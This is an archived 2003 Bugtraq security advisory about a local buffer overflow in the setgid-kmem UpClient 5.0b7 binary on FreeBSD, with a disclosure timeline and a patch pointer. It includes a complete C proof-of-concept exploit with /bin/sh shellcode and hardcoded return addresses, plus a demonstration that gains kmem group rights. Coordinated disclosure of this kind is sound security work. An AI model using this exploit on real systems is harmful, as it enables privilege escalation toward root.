lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <45432789478.20030527102348@nux-acid.org>
Date: Tue, 27 May 2003 10:23:48 +0200
From: Gino Thomas <g.thomas@...-acid.org>
To: bugtraq@...urityfocus.com
Subject: NuxAcid#002 - Buffer Overflow in UpClient


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
NUX-ACID ADVISORY #002

Advisory name           : Local Buffer Overflow in upclient 
Risk                    : Medium (exploit grants kmem rights)
Date                    : 27.05.2003
Application             : upclient
Versions Vulnerable     : UpClient 5.0b7, possible others
Vendor                  : Carsten Klapp <carstenklapp@...rs.sf.net> \
                          Ryan Grove ryan@...ko.com

Timeline:
23.05.03 - found vulnerability
23.05.03 - written proof of concept code
23.05.03 - informed the author(s)
25.05.03 - informed the freebsd security officers
26.05.03 - solution found
27.05.03 - public release


by Gino Thomas (alias 'dairaen'), http://www.nux-acid.org
This information is provided freely to all interested parties
and may be redistributed provided that it is not altered in any way

This advisory was provided under the policy 
documented at http://www.wiretrip.net/rfp/policy.html
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


=+[Overview]+=

Uptime Client is a little program that keeps track of your uptime and
sends it to a server where you can compare it to many other hosts and
browse through various statistical information. 

WWW: http://uptimes.wonko.com/


=+[Description]+=

While pentesting the FreeBSD portstree i found /usr/ports/misc/upclient
vulnerable to a common buffer overflow.

on FreeBSD at least upclient is installed (default):
-r-xr-sr-x  1 root  kmem  28312 Mar 23 19:58 /usr/local/sbin/upclient

means, the attacker could get egid=2(kmem) groups=2(kmem) rights,
which at least provide read access to the following files:

develop# find / -group kmem
/dev/kmem
/dev/mem
/dev/perfmon
/usr/bin/fstat
/usr/bin/ipcs
/usr/bin/netstat
/usr/bin/systat
/usr/bin/top
/usr/bin/vmstat
/usr/sbin/iostat
/usr/sbin/pstat
/usr/sbin/swapinfo
/usr/sbin/trpt
/sbin/ccdconfig

Having egid=2(kmem) groups=2(kmem) makes it easier
to get root privileges.

>From 'man kmem':

"The special file /dev/mem is an interface to the physical memory of the
computer.  Byte offsets in this file are interpreted as physical memory
addresses.  Reading and writing this file is equivalent to reading and
writing memory itself.  Only offsets within the bounds of /dev/mem are
allowed.

Kernel virtual memory is accessed through the interface /dev/kmem in the
same manner as /dev/mem.  Only kernel virtual addresses that are cur-
rently mapped to memory are allowed."


=+[Proof]+=

See the exploit in action:

> id
uid=1001(admin) gid=1001(admin) groups=1001(admin), 0(wheel)
>./upclient_exploit
$ id
uid=1001(admin) gid=1001(admin) egid=2(kmem) groups=2(kmem), 
1001(admin),0(wheel)
$

-------------------------------upclient_exploit.c-------------------------------
/*
*       
* NuxAcid - UPCLIENT Local Buffer Overflow Exploit
* written on/for FreeBSD
* tested against UpClient 5.0b7 on FreeBSD 4.8
* for FreeBSD 5.x the code has to be tweaked
* other versions may be vulnerable too
*
* 2003 by Gino Thomas, http://www.nux-acid.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFERSIZE 1022


unsigned long get_sp(void) {
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  char buffer[BUFFERSIZE] = "";

//FreeBSD exec/setuid Shellcode
static char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

memset(buffer, 0x90 ,sizeof(buffer));
*(long *)&buffer[BUFFERSIZE - 4] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 8] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 16] = 0xbfbffb21;
memcpy(buffer + BUFFERSIZE - 16 - strlen(shellcode), shellcode, strlen(shellcode));

execl("/usr/local/sbin/upclient","upclient", "-p", buffer, NULL);
return 0;
}
-------------------------------upclient_exploit.c-------------------------------



=+[Solution]+=

The author was informed 23.05.03. He immediately
started to develop a patch and has taken security
very serious, always informing me about his steps
and willing to improve the overall security of 
upclient.


Patches:

upgrade to UpClient 5.0b8 at https://sourceforge.net/projects/upclient/



=+[Personal Marketing]+=

I am seeking a JOB in munich (germany).
If you have security related jobs to offer
please feel free to contact me at g.thomas@...-acid.org

You can get a short overview of me and my skills
by reading the personal section of my website 
http://www.nux-acid.org

EOF

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ